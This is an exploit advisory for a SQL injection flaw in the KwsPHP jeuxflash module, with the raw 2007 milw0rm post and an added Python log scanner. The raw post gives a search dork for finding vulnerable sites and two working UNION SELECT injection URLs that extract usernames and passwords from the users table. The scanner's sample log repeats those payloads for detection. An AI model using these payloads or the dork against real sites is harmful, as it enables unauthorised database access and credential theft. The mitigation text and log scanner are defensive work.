Vendor: KwsPHP Module (jeuxflash)
By: H-T Team (HouSSamix _ ToXiC350)
N/A
CVSS
HIGH
Remote SQL Injection
CWE
Product Name: KwsPHP Module (jeuxflash)
Patch Exists: NO
Platforms Tested:
2007

KwsPHP Module (jeuxflash) Remote SQL Injection Vulnerability

The KwsPHP Module (jeuxflash) is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability to execute arbitrary SQL queries and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security patches and updates provided by the vendor. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.

Exploit-DB raw data:

#########################################################################
KwsPHP  Module   ( jeuxflash )    Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : H-T Team ( HouSSamix _ ToXiC350  )
## HOME : http://no-hack.fr & http://no-hack.net


## Site:
http://koogar.alorys-hebergement.com/kwsphp/index.php?mod=downloads&filedl=30&before=8&p_dl=1
## Dork : inurl:index.php?mod=jeuxflash


## EXPLOITS :

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pseudo,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1--

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pass,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1--


## Note
You must register first.



## GREETZ  :  CoNaN , hell15 , RachiDox , Mr Al3FriTe , muslim4ever , DDoS

#########################################################################
KwsPHP  Module   ( jeuxflash )    Remote SQL Injection Vulnerability
#########################################################################

# milw0rm.com [2007-09-13]
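
For the input-validation point under Mitigation, here is an added detection example (not part of the original advisory or of KwsPHP) that scans web access logs for `mod=jeuxflash` requests whose `id` parameter is not a plain integer. The log lines are constructed samples, and the combined log format, the ten-digit limit and the three decoding rounds are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Allowlist: the module's id is expected to be a plain non-negative integer.
VALID_ID_RE = re.compile(r'\A[0-9]{1,10}\Z')
MAX_DECODE_ROUNDS = 3  # assumption: how many layers of percent-encoding to peel


def fully_decode(value):
    """Percent-decode repeatedly so %2520-style double encoding is exposed."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_jeuxflash_ids(log_lines):
    """Return (line_number, decoded_id) for jeuxflash requests with a non-numeric id."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs performs the first round of percent-decoding.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "jeuxflash" not in [m.lower() for m in query.get("mod", [])]:
            continue
        for raw_id in query.get("id", []):
            decoded = fully_decode(raw_id)
            if not VALID_ID_RE.match(decoded):
                hits.append((number, decoded))
    return hits


# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Sep/2007:10:01:02 +0000] "GET /index.php?mod=jeuxflash&ac=play&id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Sep/2007:10:02:10 +0000] "GET /index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pseudo,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1-- HTTP/1.1" 200 4801',
    '203.0.113.9 - - [13/Sep/2007:10:02:31 +0000] "GET /index.php?mod=jeuxflash&ac=play&id=-1%2520union%2520select%25201,2-- HTTP/1.1" 200 4790',
    '203.0.113.7 - - [13/Sep/2007:10:03:00 +0000] "GET /index.php?mod=downloads&filedl=30&before=8&p_dl=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in suspicious_jeuxflash_ids(SAMPLE_LOG):
        print(f"line {number}: non-numeric id {value!r}")
```

The same allowlist (reject any `id` that is not purely digits) is the check the application itself should enforce before the value reaches a query.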